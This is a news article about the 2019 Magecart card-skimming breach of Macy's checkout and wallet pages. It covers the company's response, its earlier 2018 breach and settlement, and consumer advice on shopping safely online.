On November 14, 2019, US retail giant Macy’s announced that it had suffered a data breach. The breach appears to be the result of another Magecart attack, with Macy’s now be added along with British Airways to a list of high profile Magecart attacks. In a Magecart attack, the hacker targets the shopping cart feature on an eCommerce website. The hacker injects malicious code into the function which allows the hacker to skim credit card details and send them to a command and control server. In the Macy’s incident malicious code was added both to the checkout and shopping cart pages which allowed the hacker to steal even more customer information.
According to the announcement, the checkout and cart pages were hacked on October 7 with the hack only been detected on October 15. This means that for a week any details entered on the compromised pages could have been collected by the hacker. The attackers in this instance were able to access customer information and credit card information that includes the customer's first name, last name, address, city, state, zip, phone number, email address, payment card number, CVV number, and card expiration details. The retail giant noted,
“On October 15, 2019, we were alerted to a suspicious connection between macys.com and another website. Our security teams immediately began an investigation. Based on our investigation, we believe that on October 7, 2019, an unauthorized third party added unauthorized computer code to two (2) pages on macys.com.The unauthorized code was highly specific and only allowed the third party to capture information submitted by customers on the following two (2) macys.com pages: (1) the checkout page - if credit card data was entered and “place order” button was hit; and (2) the wallet page - accessed through My Account. Our teams successfully removed the unauthorized code on October 15, 2019.”
Macy’s shared further information with Bleeping Computer stating,
“We are aware of a data security incident involving a small number of our customers on Macys.com. We have investigated the matter thoroughly, addressed the cause and have implemented additional security measures as a precaution. All impacted customers have been notified, and we are offering consumer protections to these customers at no cost.”
The added protection offered by Macy’s is the free use of Experian identity protection services. The company further advises all customers to monitor their accounts and report any suspicious transactions or occurrences. The company is working with law enforcement and another yet to be named forensic firm, further, the company has notified companies like Visa, Mastercard, and other credit card operations of the breach. In the same article published recently by Bleeping Computer, an anonymous source shared the obfuscated malicious code. The code reveals that when the hacker compromised the Macy's website, they altered the script to include an obfuscated Magecart script. Once a customer submitted their payment information this script would launch and send the submitted information to a command and control server at Barn-x.com/api/analysis.php.
Not the First Time
This is not the first breach suffered by Macy’s. In July 2018, news reports began emerging that the company had suffered a data breach. It was revealed that the hackers managed to steal customer names and credit card numbers, expiration dates, and security numbers. At the time it was estimated that the breach affected 0.5% of Macy’s and their sister company Bloomingdale's online customer base. In this instance, the compromise began in late April and may have run to the middle of June. Macy’s again provided customer protection services free of charge. However, this was not enough to stop some affected customers from seeking legal restitution.
A class-action suit was opened against Macy’s shortly after customers were notified of the breach. Before the courts could decide on the matter Macy’s reached a settlement deal with customers of over 250,000 USD. Court cases such as these show the added, often unexpected costs associated with data breaches. For smaller companies reliant on online trade such breaches can ultimately result in bankruptcy. Any online trader should make a concerted effort to follow all legislation regarding their responsibilities in handling consumer data, particularity any data that contains personally identifiable information.
It is not only companies that can protect data, but consumers can also help in the fight. By shopping at online stores that require further authentication is strongly advised. Services like Apple Pay can also be used as they require the input of a generated code to complete a purchase. Customers can also use the services of credit unions to monitor if any accounts have been opened in their name without their knowledge. Recently the US revenue service, the IRS, published advice to help keep consumers protected during the upcoming holiday season, and the Black Friday rush. The IRS advises people to:
- Use security software for computers and mobile phones – and keep it updated.
- Protect personal information; don't hand it out to just anyone.
- Use strong and unique passwords for all accounts.
- Use two-factor authentication whenever possible.
- Shop only secure websites; Look for the "https" in web addresses; avoid shopping on unsecured and public WiFi in places like shopping malls.
- Routinely back up files on computers and mobile phones.
With Magecart attacks, there is a tendency to blame the operators of the website for not keeping proper tabs on their security. While this is true in a lot of cases, the reality of cybersecurity is that both the supplier and the end-user can take steps to prevent attacks. Making use of more secure options when paying for items online should not be seen as a chore but a necessity.